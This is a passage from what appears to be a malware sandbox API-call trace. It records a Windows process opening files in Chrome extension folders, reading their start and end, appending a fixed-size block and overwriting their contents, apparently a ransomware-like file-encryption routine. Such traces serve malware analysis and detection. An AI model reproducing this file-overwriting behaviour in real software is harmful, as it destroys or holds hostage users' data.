hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xee [0149.143] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0149.143] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.143] ReleaseMutex (hMutex=0x168) returned 1 [0149.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.143] ReadFile (in: hFile=0x1dc, lpBuffer=0x2696608, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696608*, lpNumberOfBytesRead=0x345f2bc*=0xee, lpOverlapped=0x0) returned 1 [0149.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0149.145] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x676, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x676, lpOverlapped=0x0) returned 1 [0149.145] CloseHandle (hObject=0x1dc) returned 1 [0149.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0149.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd2 [0149.806] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0149.806] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.806] ReleaseMutex (hMutex=0x168) returned 1 [0149.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0149.807] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5e38, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5e38*, lpNumberOfBytesRead=0x345f2bc*=0xd2, lpOverlapped=0x0) returned 1 [0149.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0149.808] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x65a, lpOverlapped=0x0) returned 1 [0149.808] CloseHandle (hObject=0x1dc) returned 1 [0149.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.048] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.048] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x102 [0152.048] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.048] ReleaseMutex (hMutex=0x168) returned 1 [0152.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.049] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb0e8, nNumberOfBytesToRead=0x102, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb0e8*, lpNumberOfBytesRead=0x345f2bc*=0x102, lpOverlapped=0x0) returned 1 [0152.050] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0152.050] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x68a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x68a, lpOverlapped=0x0) returned 1 [0152.051] CloseHandle (hObject=0x1dc) returned 1 [0152.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.052] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.052] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xce17 [0152.053] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.053] ReleaseMutex (hMutex=0x168) returned 1 [0152.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_sender.js", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_sender.js", cchWideChar=14, lpMultiByteStr=0x1f735ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_sender.js", lpUsedDefaultChar=0x0) returned 14 [0152.053] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0152.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xbe17 [0152.056] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xbe17 [0152.057] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.058] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0152.058] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0152.059] CloseHandle (hObject=0x1dc) returned 1 [0152.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3b [0152.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.060] ReleaseMutex (hMutex=0x168) returned 1 [0152.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="setup.html", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="setup.html", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.html", lpUsedDefaultChar=0x0) returned 10 [0152.061] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f96d10, nNumberOfBytesToRead=0x3b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f96d10*, lpNumberOfBytesRead=0x345f2bc*=0x3b, lpOverlapped=0x0) returned 1 [0152.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0152.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c3, lpOverlapped=0x0) returned 1 [0152.062] CloseHandle (hObject=0x1dc) returned 1 [0152.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x46039 [0152.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.064] ReleaseMutex (hMutex=0x168) returned 1 [0152.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="material_css_min.css", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="material_css_min.css", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="material_css_min.css", lpUsedDefaultChar=0x0) returned 20 [0152.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0152.067] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x45039 [0152.068] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.070] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x45039 [0152.070] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.070] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0152.070] WriteFile (in: hFile=0x1dc, lpBuffer=0x28790b8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0152.071] CloseHandle (hObject=0x1dc) returned 1 [0152.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x52cb [0152.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.072] ReleaseMutex (hMutex=0x168) returned 1 [0152.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.073] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.075] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x42cb [0152.076] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.077] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x42cb [0152.077] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.077] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0152.077] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.078] CloseHandle (hObject=0x1dc) returned 1 [0152.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0152.079] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.079] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3e85 [0152.079] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0152.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.079] ReleaseMutex (hMutex=0x168) returned 1 [0152.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0152.080] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.019] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e85 [0153.020] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.020] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e85 [0153.021] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.022] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0153.022] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0153.022] CloseHandle (hObject=0x1dc) returned 1 [0153.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0153.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0153.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x40d4 [0153.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0153.024] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.024] ReleaseMutex (hMutex=0x168) returned 1 [0153.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0153.024] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.031] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x30d4 [0154.584] ReadFile (in: 